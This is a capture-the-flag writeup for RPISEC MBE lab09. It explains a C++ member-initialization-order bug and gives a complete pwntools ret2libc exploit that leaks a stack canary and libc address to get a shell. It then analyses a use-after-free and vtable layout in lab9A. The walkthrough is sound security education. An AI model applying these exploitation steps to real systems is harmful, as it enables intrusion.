RPISEC/MBE: writeup lab09 (C++)

In the last lab we focused on Misc and Stack Cookies. In this next to last lab some characteristics when dealing with C++ are introduced.

The lab contains only two levels:
–> lab9C
–> lab9A


lab9C

The credentials for the first level of this lab are lab9C with the password lab09start:

login as: lab9C
lab9C@localhost's password: (lab09start)
        ____________________.___  _____________________________
        \______   \______   \   |/   _____/\_   _____/\_   ___ \
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/
         |    |   \|    |   |   |/        \ |        \\     \____
         |____|_  /|____|   |___/_______  //_______  / \______  /
                \/                      \/         \/         \/
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/

        --------------------------------------------------------

                       Challenges are in /levels
                   Passwords are in /home/lab*/.pass
            You can create files or work directories in /tmp

         -----------------[ contact@rpis.ec ]-----------------

As usual we start by viewing the source code:

lab9C@warzone:/levels/lab09$ cat lab9C.cpp
/*
 *  compile: g++ -fstack-protector-all -z relro -z now ./lab9C.cpp -o lab9C
 *
 *  DSVector - A basic homwork implementation of std::vector
 *  This is a wrapper program to test it!
 */

#include <iostream>
#include <limits>
#include <cstdlib>
#include <cstdio>
#include <cstring>
#include <unistd.h>
#include "utils.h"

ENABLE_TIMEOUT(60)

void
print_menu(void)
{
    printf("+------- DSVector Test Menu -------+\n"
           "| 1. Append item                   |\n"
           "| 2. Read item                     |\n"
           "| 3. Quit                          |\n"
           "+----------------------------------+\n");
}

template <class T>
class DSVector {
    public:
                     // I don't like indexing from 0, I learned VB.NET first.
        DSVector() : len(1), alloc_len(len+256) {}
        unsigned int size() { return len; }
        void append(T item);
                                            // No info leaks, either!
        T get(unsigned int index) { return (index < alloc_len ? vector_data[index] : -1); };
    private:
        unsigned int alloc_len;
        unsigned int len;
        // I was asleep during the dynamic sizing part, at least you can't overflow!
        T vector_data[1+256];
};

template <class T>
void
DSVector<T>::append(T item)
{
    // No overflow for you!
    if (len >= alloc_len) {
        std::cout << "Vector is full!" << std::endl;
        return;
    }
    vector_data[this->len++] = item;
}

int
main(int argc, char *argv[])
{
    DSVector<int> test1;
    unsigned int choice = 0;
    bool done = false;
    disable_buffering(stdout);

    while (!done) {
        print_menu();
        std::cout << "Enter choice: ";
        choice = get_unum();

        /* handle menu selection */
        switch (choice) {
        case 1:
            std::cout << "Enter a number: ";
            choice = get_unum();
            test1.append(choice);
            break;
        case 2:
            std::cout << "Choose an index: ";
            choice = get_unum();
            printf("DSVector[%d] = %d\n", choice, test1.get(choice));
            break;
        case 3:
            done = true;
            break;
        default:
            puts("Invalid choice!");
            break;
        }
    }

    return EXIT_SUCCESS;
}

What does the program do?
–> Within the source file a template class called DSVector is declared (lines 28-29) which serves as a wrapper for an array.
    – The class contains three attributes: two unsigned int len, alloc_len and an array vector_data.
    – Also there are four methods: the constructor (DSVector() on line 32), size, append and get.
    – get (line 36) simply returns an element of the internal array when the index is smaller than index.
    – append (line 46) takes an element and adds it to the internal array if len has not reached alloc_len yet.
–> Within the main function (line 57) an object of DSVector called test1 is instantiated providing the template type int (line 59).
–> After this the user can append (line 74) or read (line 79) an item to / from the vector. The program keeps looping until the user chooses 3. Quit (line 82).

Again the challenge is remote:

lab9C@warzone:/levels/lab09$ cat lab9C.readme
nc wargame.server.example 9943

Where is the vulnerability within the program?

The usual way to spot a vulnerability is to audit the source code. Nevertheless it is also worth playing around with the program and look out for unusual behavior:

lab9C@warzone:/levels/lab09$ ./lab9C
+------- DSVector Test Menu -------+
| 1. Append item                   |
| 2. Read item                     |
| 3. Quit                          |
+----------------------------------+
Enter choice: 2
Choose an index: 7
DSVector[7] = 2
+------- DSVector Test Menu -------+
| 1. Append item                   |
| 2. Read item                     |
| 3. Quit                          |
+----------------------------------+
Enter choice: 2
Choose an index: 8
DSVector[8] = -1217723862

We can read items from the vector even if we have not added anything before.

Let’s reconsider the method responsible for this:

        T get(unsigned int index) { return (index < alloc_len ? vector_data[index] : -1); };

get only tests if the provided index is smaller than alloc_len but not if it is smaller than the actual length (len) which is incremented on each call to append.

What else can we do?

+------- DSVector Test Menu -------+
| 1. Append item                   |
| 2. Read item                     |
| 3. Quit                          |
+----------------------------------+
Enter choice: 2
Choose an index: 257
DSVector[257] = 484744448
+------- DSVector Test Menu -------+
| 1. Append item                   |
| 2. Read item                     |
| 3. Quit                          |
+----------------------------------+
Enter choice: 2
Choose an index: 258
DSVector[258] = -1216802432

This is strange. We can also read from indices beyond 257? But get should test if the index is smaller than alloc_len. And alloc_len should have been initialized with 257!?

        DSVector() : len(1), alloc_len(len+256) {}

Let’s add some values to the vector and inspect the memory using gdb:

lab9C@warzone:/levels/lab09$ gdb lab9C
Reading symbols from lab9C...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /levels/lab09/lab9C

+------- DSVector Test Menu -------+
| 1. Append item                   |
| 2. Read item                     |
| 3. Quit                          |
+----------------------------------+
Enter choice: 1
Enter a number: 1337
...
Enter choice: 1
Enter a number: 1337
...
Enter choice: 1
Enter a number: 1337
...
Enter choice: ^C
...
gdb-peda$ searchmem 0x539
...
            [stack] : 0xbffff2dc --> 0x539
            [stack] : 0xbffff2ec --> 0x539
            [stack] : 0xbffff2f0 --> 0x539
            [stack] : 0xbffff2f4 --> 0x539
gdb-peda$ x/40xw 0xbffff2dc - 0x20
0xbffff2bc:     0x00000000      0x00000000      0xb7fe6dcd      0xbffff794
0xbffff2cc:     0x00000001      0x00000000      0xb7fea8f0      0x00fff5d8
0xbffff2dc:     0x00000539      0xb7fe6ecd      0x00000004      0xb7d49ffd
0xbffff2ec:     0x00000539      0x00000539      0x00000539      0xb7d39034
0xbffff2fc:     0x00000002      0xb7d36604      0x00000002      0xb7f2022a
0xbffff30c:     0xb7fdaacc      0xbffff300      0xb7fff000      0xb7d3ac80
0xbffff31c:     0x00000002      0xb7d36604      0xb7fe7524      0xb7f2022a
0xbffff32c:     0xb7fdaacc      0xb7d3c9e8      0xb7fe6dcd      0xb7d36604
0xbffff33c:     0x00000006      0xbffff370      0x00e49cb2      0x1c93965e
0xbffff34c:     0xb7d3aec8      0xb7d43b18      0xb7fe6dcd      0xb7f20270

I added the value 1337 = 0x539 three times and found the stored values on the stack. Having the source code in mind we can now relate the values in memory to the variables:

0xbffff2e0: 0xb7fe6ecd  <-- alloc_len
0xb7fe6ee4: 0x00000004  <-- len
0xb7fe6ee8: 0xb7d49ffd  <-- vector_data[0]
0xb7fe6eec: 0x00000539  <-- vector_data[1]
0xbffff2f0: 0x00000539  <-- vector_data[2]
0xbffff2f4: 0x00000539  <-- vector_data[3]
...

The element vector_data[0] is not initialized because the first index used is 1. But what is that value in alloc_len? It is definitely not 257 as we might expected.

The reason for this can be found in the following to parts of the source code:

        DSVector() : len(1), alloc_len(len+256) {}
        unsigned int alloc_len;
        unsigned int len;

Within the initialization list in the constructor len is initialized at first. After this alloc_len is set to len+256. But both attributes are declared the other way around: alloc_len is declared at first and then len. The initialization list uses this ordering and not the order the attributes are listed in it! This means that alloc_len is initialized with the uninitialized len + 256. After this len is set to 1.

Because of this vulnerability we can read beyond the array and also overflow the array. Our goal is to use ret2libc to call system("/bin/sh"). In order to do this we have to:
–> Leak the stack canary since the ret instruction at the end of the function is not executed when we overwrite the stack canary with an invalid value.
–> Leak a libc address to calculate the offset to system and the string /bin/sh.

Let's start by determining where the stack canary and the return address are stored by setting breakpoints at the appropriate location within the main function:

gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x00000e0f <+0>:     push   ebp
   0x00000e10 <+1>:     mov    ebp,esp
   0x00000e12 <+3>:     push   ebx
   0x00000e13 <+4>:     and    esp,0xfffffff0
   0x00000e16 <+7>:     sub    esp,0x440
   0x00000e1c <+13>:    call   0xb60 <__x86.get_pc_thunk.bx>
   0x00000e21 <+18>:    add    ebx,0x216b
   0x00000e27 <+24>:    mov    eax,DWORD PTR [ebp+0x8]
   0x00000e2a <+27>:    mov    DWORD PTR [esp+0x1c],eax
   0x00000e2e <+31>:    mov    eax,DWORD PTR [ebp+0xc]
   0x00000e31 <+34>:    mov    DWORD PTR [esp+0x18],eax
   0x00000e35 <+38>:    mov    eax,gs:0x14
   0x00000e3b <+44>:    mov    DWORD PTR [esp+0x43c],eax
   ...
End of assembler dump.
gdb-peda$ b *main
Breakpoint 1 at 0xe0f
gdb-peda$ b *main+44
Breakpoint 2 at 0xe3b

At the first breakpoint we can see where the return address is stored:

gdb-peda$ r
Starting program: /levels/lab09/lab9C
[----------------------------------registers-----------------------------------]
EAX: 0x1
EBX: 0xb7ee1000 --> 0x1a9da8
ECX: 0x91c141ca
EDX: 0xbffff724 --> 0xb7ee1000 --> 0x1a9da8
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xbffff6fc --> 0xb7d50a83 (<__libc_start_main+243>:        mov    DWORD PTR [esp],eax)
EIP: 0x80000e0f (<main>:        push   ebp)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80000e0c <_Z10print_menuv+63>:     pop    ebx
   0x80000e0d <_Z10print_menuv+64>:     pop    ebp
   0x80000e0e <_Z10print_menuv+65>:     ret
=> 0x80000e0f <main>:   push   ebp
   0x80000e10 <main+1>: mov    ebp,esp
   0x80000e12 <main+3>: push   ebx
   0x80000e13 <main+4>: and    esp,0xfffffff0
   0x80000e16 <main+7>: sub    esp,0x440
[------------------------------------stack-------------------------------------]
0000| 0xbffff6fc --> 0xb7d50a83 (<__libc_start_main+243>:       mov    DWORD PTR [esp],eax)
0004| 0xbffff700 --> 0x1
0008| 0xbffff704 --> 0xbffff794 --> 0xbffff8b6 ("/levels/lab09/lab9C")
0012| 0xbffff708 --> 0xbffff79c --> 0xbffff8ca ("XDG_SESSION_ID=30")
0016| 0xbffff70c --> 0xb7feccea (<call_init+26>:        add    ebx,0x12316)
0020| 0xbffff710 --> 0x1
0024| 0xbffff714 --> 0xbffff794 --> 0xbffff8b6 ("/levels/lab09/lab9C")
0028| 0xbffff718 --> 0xbffff79c --> 0xbffff8ca ("XDG_SESSION_ID=30")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x80000e0f in main ()

The return address is stored at 0xbffff6fc.

At the second breakpoint we can see what value is used for the stack canary:

gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x5fce5b00
EBX: 0x80002f8c --> 0x2e8c
ECX: 0x91c141ca
EDX: 0xbffff724 --> 0xb7ee1000 --> 0x1a9da8
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6f8 --> 0x0
ESP: 0xbffff2b0 --> 0xbffff5a8 --> 0x6
EIP: 0x80000e3b (<main+44>:     mov    DWORD PTR [esp+0x43c],eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80000e2e <main+31>:        mov    eax,DWORD PTR [ebp+0xc]
   0x80000e31 <main+34>:        mov    DWORD PTR [esp+0x18],eax
   0x80000e35 <main+38>:        mov    eax,gs:0x14
=> 0x80000e3b <main+44>:        mov    DWORD PTR [esp+0x43c],eax
   0x80000e42 <main+51>:        xor    eax,eax
   0x80000e44 <main+53>:        lea    eax,[esp+0x30]
   0x80000e48 <main+57>:        mov    DWORD PTR [esp],eax
   0x80000e4b <main+60>:        call   0x80001050 <_ZN8DSVectorIiEC2Ev>
[------------------------------------stack-------------------------------------]
0000| 0xbffff2b0 --> 0xbffff5a8 --> 0x6
0004| 0xbffff2b4 --> 0x0
0008| 0xbffff2b8 --> 0xbffff2d8 --> 0xbffff5d8 --> 0xb7fc5000 --> 0xdfa7c
0012| 0xbffff2bc --> 0xb7fea930 (<openaux+64>:  mov    DWORD PTR [esi+0x14],eax)
0016| 0xbffff2c0 --> 0x0
0020| 0xbffff2c4 --> 0xb7fe6dcd (<check_match+285>:     mov    ecx,DWORD PTR [esp+0x1c])
0024| 0xbffff2c8 --> 0xbffff794 --> 0xbffff8b6 ("/levels/lab09/lab9C")
0028| 0xbffff2cc --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x80000e3b in main ()

The value used as stack canary is 0x5fce5b00.

Now let's add a value to the vector in order to locate the vector on the stack:

gdb-peda$ c
Continuing.
+------- DSVector Test Menu -------+
| 1. Append item                   |
| 2. Read item                     |
| 3. Quit                          |
+----------------------------------+
Enter choice: 1
Enter a number: 1337
+------- DSVector Test Menu -------+
| 1. Append item                   |
| 2. Read item                     |
| 3. Quit                          |
+----------------------------------+
Enter choice: ^C
...
gdb-peda$ searchmem 0x539
Searching for '0x539' in: None ranges
Found 17 results, display max 17 items:
...
            [stack] : 0xbffff2dc --> 0x539
            [stack] : 0xbffff2ec --> 0x539
gdb-peda$ x/300xw 0xbffff2dc
0xbffff2dc:     0x00000539      0xb7fe6ecd      0x00000002      0xb7d49ffd
0xbffff2ec:     0x00000539      0x00000000      0xb7fff000      0xb7d39034
...
0xbffff6dc:     0xb7d6a42d      0xb7ee13c4      0xb7d6a416      0x8000118b
0xbffff6ec:     0x5fce5b00      0x80001180      0xb7ee1000      0x00000000
0xbffff6fc:     0xb7d50a83      0x00000001      0xbffff794      0xbffff79c
...
gdb-peda$ p (0xbffff6ec - 0xbffff2e8) / 4
$1 = 0x101
gdb-peda$ p (0xbffff6fc - 0xbffff2e8) / 4
$2 = 0x105

The member array vector_data begins at 0xbffff2e8 (the first value vector_data[0] being 0xb7d49ffd). The stack canary is located at 0xbffff6ec and the return address at 0xbffff6fc (as we already figured out). This means that we can reference the stack canary with index 257 (0x101) and the return address with 261 (0x105).

Since the return address is already a libc address (__libc_start_main+243), we can use this address to calculate the address of system and "/bin/sh":

gdb-peda$ p system - 0xb7d50a83
$3 = (<text variable, no debug info> *) 0x2670d
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7e97a24 ("/bin/sh")
gdb-peda$ p 0xb7e97a24 - 0xb7d50a83
$4 = 0x146fa1

We now have all information needed to implement the exploit. The final python-script will do the following:
–> Leak the stack canary (index 257).
–> Leak the return address of main (index 261).
–> Calculate the address of system and string "/bin/sh".
–> Store 256 values.
–> Store the stack canary (first overflowing value).
–> Store another 3 values (offset to return address).
–> Store address of system (overwrite return address).
–> Store another value (return address after call to system).
–> Store address of string "/bin/sh" (argument for system).
–> Choose 3. Quit to trigger ret instruction.

lab9C@warzone:/levels/lab09$ cat /tmp/exploit_lab9C.py
from pwn import *

def append(p, x):
  p.sendline("1")
  p.sendline(str(x))
  p.recv(1000)
  
def leak(p, x):
  p.sendline("2")
  p.sendline(str(x))
  p.recvuntil(str(x)+"] = ")
  ret = p.recv(100)
  leak = int(ret[0:ret.index("\n")], 10)
  if (leak < 0): leak = -((leak-1)^0xffffffff)
  return leak


p = remote("localhost", 9943)
p.recv(1000)

# leak stack canary
stack_can = leak(p, 257)
log.success("stack_canary: " + hex(stack_can))

# leak stack canary + 3 dword + return address
leak = leak(p, 261)
log.success("leak: " + hex(leak))

addr_system = leak + 0x2670d
addr_binsh  = leak + 0x146fa1

for i in range(256):
  append(p, 1337)

append(p, stack_can)

for i in range(3):
  append(p, 1337)

append(p, addr_system)
append(p, 1337)
append(p, addr_binsh)

p.sendline("3")
p.recv(1000)

p.interactive()

Running the script:

lab9C@warzone:/levels/lab09$ python /tmp/exploit_lab9C.py
[+] Opening connection to localhost on port 9943: Done
[+] stack_canary: 0x2c50f100
[+] leak: 0xb7460a83
[*] Switching to interactive mode
$ id
uid=1034(lab9A) gid=1035(lab9A) groups=1035(lab9A),1001(gameuser)
$ cat /home/lab9A/.pass
1_th0uGht_th4t_w4rn1ng_wa5_l4m3

Done! The password for the next level is 1_th0uGht_th4t_w4rn1ng_wa5_l4m3.


lab9A

The credentials for this level are lab9A with the password 1_th0uGht_th4t_w4rn1ng_wa5_l4m3:

login as: lab9A
lab9A@localhost's password: (1_th0uGht_th4t_w4rn1ng_wa5_l4m3)
        ____________________.___  _____________________________
        \______   \______   \   |/   _____/\_   _____/\_   ___ \
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/
         |    |   \|    |   |   |/        \ |        \\     \____
         |____|_  /|____|   |___/_______  //_______  / \______  /
                \/                      \/         \/         \/
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/

        --------------------------------------------------------

                       Challenges are in /levels
                   Passwords are in /home/lab*/.pass
            You can create files or work directories in /tmp

         -----------------[ contact@rpis.ec ]-----------------

Let's have a look at the source code:

lab9A@warzone:/levels/lab09$ cat lab9A.cpp
/*
 * compile: g++ -fstack-protector-all -z relro -z now -O1 -fPIE -pie ./lab9A.cpp -g -o lab9A
 * clark's improved item storage server!
 * Changelog:
 *   * Using HashSets for insta-access!
 *
*/

#include <iostream>
#include <cstdlib>
#include <cstdio>
#include <unistd.h>
#include "utils.h"

ENABLE_TIMEOUT(300)

#define SIZE_HASHSET_VEC 8

void
print_menu(void)
{
    printf("+----------- clark's improved item storage -----------+\n"
           "| [ -- Now using HashSets for insta-access to items!  |\n"
           "| 1. Open a lockbox                                   |\n"
           "| 2. Add an item to a lockbox                         |\n"
           "| 3. Get an item from a lockbox                       |\n"
           "| 4. Destroy your lockbox and items in it             |\n"
           "| 5. Exit                                             |\n"
           "+-----------------------------------------------------+\n");
}

/********* Storage implementation **********/

// hash functor
class hash_num {
    public:
        // I'm no mathematician
        unsigned int
        operator() (unsigned int const &key) const {
            return key;
        }
};

// Hashset
template<class T, class HashFunc>
class HashSet {
    public:
        HashSet(unsigned int size) : m_size(size), set_data(new T[size]) {}
        virtual ~HashSet() { delete [] set_data; }
        virtual void add(T val);
        virtual unsigned int find(T val);
        virtual T get(unsigned int);
    private:
        unsigned int m_size;
        HashFunc m_hash;
        T *set_data;
};
typedef HashSet<int, hash_num> hashset_int;

template<class T, class HashFunc>
void
HashSet<T, HashFunc>::add(T val)
{
    int index = this->m_hash(val) % this->m_size;
    this->set_data[index] = val;
}

template<class T, class HashFunc>
unsigned int
HashSet<T, HashFunc>::find(T val)
{
    return this->m_hash(val) % this->m_size;
}

template<class T, class HashFunc>
T
HashSet<T, HashFunc>::get(unsigned int index)
{
    if (index >= m_size) {
        std::cout << "Invalid index" << std::endl;
        return T();
    }
    return set_data[index];
}

/********* Storage interface implementation **********/
void
do_new_set(hashset_int **set_vec)
{
    int bin = -1;
    int choice = -1;
    std::cout << "Which lockbox do you want?: ";
    bin = get_unum();
    if (bin < 0) {
        std::cout << "Invalid set ID!" << std::endl;
        return;
    } else if (bin >= SIZE_HASHSET_VEC) {
        std::cout << "No more room!" << std::endl;
        return;
    }
    std::cout << "How many items will you store?: ";
    choice = get_unum();
    set_vec[bin] = new hashset_int(choice);
}

void
do_add_item(hashset_int **set_vec)
{
    int set_id = -1;
    int item_val = -1;

    std::cout << "Which lockbox?: ";
    set_id = get_unum();
    if (set_id < 0 || set_id >= SIZE_HASHSET_VEC) {
        std::cout << "Invalid set ID!" << std::endl;
        return;
    }

    std::cout << "Item value: ";
    item_val = get_unum();
    set_vec[set_id]->add(item_val);
}

void
do_find_item(hashset_int **set_vec)
{
    int set_id = -1;
    int item_val = -1;
    int item_index = -1;

    std::cout << "Which lockbox?: ";
    set_id = get_unum();
    if (set_id < 0 || set_id >= SIZE_HASHSET_VEC) {
        std::cout << "Invalid set ID!" << std::endl;
        return;
    }

    std::cout << "Item value: ";
    item_val = get_unum();
    item_index = set_vec[set_id]->find(item_val);
    if (item_index == -1) {
        std::cout << "Item not found!" << std::endl;
    } else {
        std::cout << "Item Found" << std::endl;
        printf("lockbox[%d] = %d\n", item_index, set_vec[set_id]->get(item_index));
    }
}

void
do_del_set(hashset_int **set_vec)
{
    int del_id;
    std::cout << "Which set?: ";
    del_id = get_unum();
    if (del_id < 0 || del_id >= SIZE_HASHSET_VEC) {
        std::cout << "Invalid ID!" << std::endl;
        return;
     }
    delete set_vec[del_id];
}

int
main(int argc, char *argv[])
{
    hashset_int **set_vec = new hashset_int*[SIZE_HASHSET_VEC];
    int choice = -1;
    bool done = false;
    disable_buffering(stdout);

    while (!done) {
        print_menu();
        std::cout << "Enter choice: ";
        choice = get_unum();
        switch (choice) {
        case 1:
            do_new_set(set_vec);
            break;
        case 2:
            do_add_item(set_vec);
            break;
        case 3:
            do_find_item(set_vec);
            break;
        case 4:
            do_del_set(set_vec);
            break;
        case 5:
            done = true;
            break;
        default:
            puts("Invalid option!");
            break;
        }
    }

    delete [] set_vec;

    return EXIT_SUCCESS;
}

What does the program do?
–> At first a class called hash_num is declared (line 35). This class simply takes an unsigned integer (key) and returns it.
–> A template class called HashSet is declared on lines 45-57.
    – This class has three attributes: an unsigned int (m_size), a class HashFunc (m_hash) and template pointer (set_data) (lines 54-56).
    – The constructor takes the size as argument, which is used to allocate a new array of the template type using the keyword new (line 48).
    – Within the destructor the allocated array is freed again using the keyword delete (line 49).
    – There are three methods: add, find and get (lines 50-52).
    – add (line 62) takes one argument which is stored in the array set_data. The index where the value is stored within the array is determined by the return value of m_hash(val) modulo m_size.
    – find (line 70) returns the index being used in add.
    – get (line 77) returns the value of set_data at the index being passed.
–> On line 58 there is a typedef for HashSet called hashset_int binding the template type to int and using the HashFunc hash_num.
–> Within the main function (line 163) an array called set_vec and holding hashset_int pointers is initialized (line 165).
–> After this the program displays a menu letting the user call on of the following functions:
    – 1. do_new_set (line 88): create a new instance of hashset_int with the user provided size and store it within set_vec at the user provided index.
    – 2. do_add_item (line 107): store the user provided value in the hashset_int instance referenced by the user provided index.
    – 3. do_find_item (line 125): get the set_data index of the user provided value using the method find and printing the corresponding value.
    – 4. do_del_set (line 150): delete the hashset_int instance referenced by the user provided index.

Yet again the challenge is remote:

lab9A@warzone:/levels/lab09$ cat lab9A.readme
nc wargame.server.example 9941

Where is the vulnerability within the program?

The keywords new and delete are the C++ equivalents to the C-functions malloc and free. As we have already seen in lab7C an application might be prone to a Use After Free vulnerability if a pointer is not set to NULL after the memory it is pointing to has been deallocated. This is true for both malloc and delete. Within the above code in the function do_del_set the memory allocated for the hashset_int instance is freed but the pointer within the array set_vec still references the deallocated memory (line 159). Let's verify this assumption using gdb:

lab9A@warzone:/levels/lab09$ gdb lab9A
Reading symbols from lab9A...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /levels/lab09/lab9A
+----------- clark's improved item storage -----------+
| [ -- Now using HashSets for insta-access to items!  |
| 1. Open a lockbox                                   |
| 2. Add an item to a lockbox                         |
| 3. Get an item from a lockbox                       |
| 4. Destroy your lockbox and items in it             |
| 5. Exit                                             |
+-----------------------------------------------------+
Enter choice: 1
Which lockbox do you want?: 0
How many items will you store?: 10
+----------- clark's improved item storage -----------+
| [ -- Now using HashSets for insta-access to items!  |
| 1. Open a lockbox                                   |
| 2. Add an item to a lockbox                         |
| 3. Get an item from a lockbox                       |
| 4. Destroy your lockbox and items in it             |
| 5. Exit                                             |
+-----------------------------------------------------+
Enter choice: ^C
Program received signal SIGINT, Interrupt.
...
gdb-peda$

I opened a lockbox at index 0 with the size 10 and paused the execution with Ctrl+C.

The array set_vec as well the hashset_int instance should be stored on the heap now:

    hashset_int **set_vec = new hashset_int*[SIZE_HASHSET_VEC];
    set_vec[bin] = new hashset_int(choice);
gdb-peda$ i proc mappings
process 30743
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x804a000     0x2000        0x0 /levels/lab09/lab9A
         0x804a000  0x804b000     0x1000     0x1000 /levels/lab09/lab9A
         0x804b000  0x804c000     0x1000     0x2000 /levels/lab09/lab9A
         0x804c000  0x806d000    0x21000        0x0 [heap]
         ...
		 
gdb-peda$ x/100xw 0x804c000
0x804c000:      0x00000000      0x00000029      0x0804c030      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000019
0x804c030:      0x08049aa8      0x0000000a      0x00000000      0x0804c048
0x804c040:      0x00000000      0x00000031      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00020f91      0x00000000      0x00000000
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
...

The heap begins at 0x804c000. Remember that each heap chunk consists of:
–> 4 bytes previous chunk size
–> 4 bytes chunk size + flags
–> actual data

The first chunk on the heap which data begins at 0x804c008 is the array set_vec. The array contains only one pointer at index 0: 0x0804c030. This is the lockbox we just added. Considering the class declaration we can determine what each value is:

class HashSet {
    public:
        HashSet(unsigned int size) : m_size(size), set_data(new T[size]) {}
        virtual ~HashSet() { delete [] set_data; }
        virtual void add(T val);
        virtual unsigned int find(T val);
        virtual T get(unsigned int);
    private:
        unsigned int m_size;
        HashFunc m_hash;
        T *set_data;
};
0x804c028:  0x00000000   --> heap meta data: previous chunk size
0x804c02c:  0x00000019   --> heap meta data: chunk size + flags
0x804c030:  0x08049aa8   --> vtable of hashset_int
0x804c034:  0x0000000a   --> m_size
0x804c038:  0x00000000   --> m_hash
0x804c03c:  0x0804c048   --> set_data
----------------------------------------------------------------
0x804c040:  0x00000000   --> heap meta data: previous chunk size
0x804c044:  0x00000031   --> heap meta data: chunk size + flags
0x804c048:  0x00000000   --> set_data[0]
0x804c04c:  0x00000000   --> set_data[1]
0x804c050:  0x00000000   --> set_data[2]
...

As you can see the first 4 bytes of the hashset_int instance is an address: 0x08049aa8. This is the Virtual Table (vtable) of the class hashset_int. The vtable contains a function pointer for each method of the class:

gdb-peda$ x/8xw 0x08049aa8
0x8049aa8 <_ZTV7HashSetIi8hash_numE+8>:  0x080496e0      0x0804971e      0x08049618      0x08049660
0x8049ab8 <_ZTV7HashSetIi8hash_numE+24>: 0x08049692      0x73614837      0x74655368      0x68386949

The constructor at 0x080496e0:

        HashSet(unsigned int size) : m_size(size), set_data(new T[size]) {}
gdb-peda$ x/3i 0x080496e0
   0x80496e0 <_ZN7HashSetIi8hash_numED2Ev>:     push   ebp
   0x80496e1 <_ZN7HashSetIi8hash_numED2Ev+1>:   mov    ebp,esp
   0x80496e3 <_ZN7HashSetIi8hash_numED2Ev+3>:   sub    esp,0x18

The destructor at 0x0804971e:

        virtual ~HashSet() { delete [] set_data; }
gdb-peda$ x/3i 0x0804971e
   0x804971e <_ZN7HashSetIi8hash_numED0Ev>:     push   ebp
   0x804971f <_ZN7HashSetIi8hash_numED0Ev+1>:   mov    ebp,esp
   0x8049721 <_ZN7HashSetIi8hash_numED0Ev+3>:   sub    esp,0x18

The method add at 0x08049618:

        virtual void add(T val);
gdb-peda$ x/3i 0x08049618
   0x8049618 <_ZN7HashSetIi8hash_numE3addEi>:   push   ebp
   0x8049619 <_ZN7HashSetIi8hash_numE3addEi+1>: mov    ebp,esp
   0x804961b <_ZN7HashSetIi8hash_numE3addEi+3>: sub    esp,0x28

The method find at 0x08049660:

        virtual unsigned int find(T val);
gdb-peda$ x/3i 0x08049660
   0x8049660 <_ZN7HashSetIi8hash_numE4findEi>:  push   ebp
   0x8049661 <_ZN7HashSetIi8hash_numE4findEi+1>:        mov    ebp,esp
   0x8049663 <_ZN7HashSetIi8hash_numE4findEi+3>:        sub    esp,0x28

The method get at 0x08049692:

        virtual T get(unsigned int);
gdb-peda$ x/3i 0x08049692
   0x8049692 <_ZN7HashSetIi8hash_numE3getEj>:   push   ebp
   0x8049693 <_ZN7HashSetIi8hash_numE3getEj+1>: mov    ebp,esp
   0x8049695 <_ZN7HashSetIi8hash_numE3getEj+3>: sub    esp,0x18

This vtable is necessary when a class contains virtual methods because these methods may be overwritten by an inheriting class. If an object is referenced by a base class pointer the compiler cannot know the actual class affiliation of the object at compile time. By using a vtable this problem is solved during runtime. Consider the following example:

class Animal {
  public:
    ...
	virtual void makeNoise() { printf("generic noise.\n"); }
	...
};

class Dog : public Animal {
  public:
    ...
	virtual void makeNoise() { printf("bark bark\n"); }

};

...

void triggerNoise(Animal *obj) {

  obj->makeNoise(); // is obj a generic Animal? or a Dog? or something else?
  
}

As the triggerNoise function is passed a base class pointer it cannot be determined during compile time to which class obj actually belongs. Because of this each object contains the vtable of the class it belongs to. The method call is then made through the vtable. An example is the add call in do_add_item:

do_add_item(hashset_int **set_vec)
{
    ...
    set_vec[set_id]->add(item_val);
}
gdb-peda$ disassemble _Z11do_add_itemPP7HashSetIi8hash_numE
Dump of assembler code for function _Z11do_add_itemPP7HashSetIi8hash_numE:
   ...
   0x08049254 <+141>:   mov    eax,DWORD PTR [eax]
   0x08049256 <+143>:   mov    eax,DWORD PTR [eax]
   0x08049258 <+145>:   add    eax,0x8
   0x0804925b <+148>:   mov    eax,DWORD PTR [eax]
   ...
   0x08049278 <+177>:   call   eax
   0x0804927a <+179>:   leave
   0x0804927b <+180>:   ret
End of assembler dump.

With the example from above eax contains the address of the set_vec array entry: 0x804c008.

After the first line...

   0x08049254 <+141>:   mov    eax,DWORD PTR [eax]

... eax contains the value stored at this address: 0x804c030. This is the address of the object.

After the next line...

   0x08049256 <+143>:   mov    eax,DWORD PTR [eax]

... eax contains the first 4 bytes of the object: the vtable (0x8049aa8)!

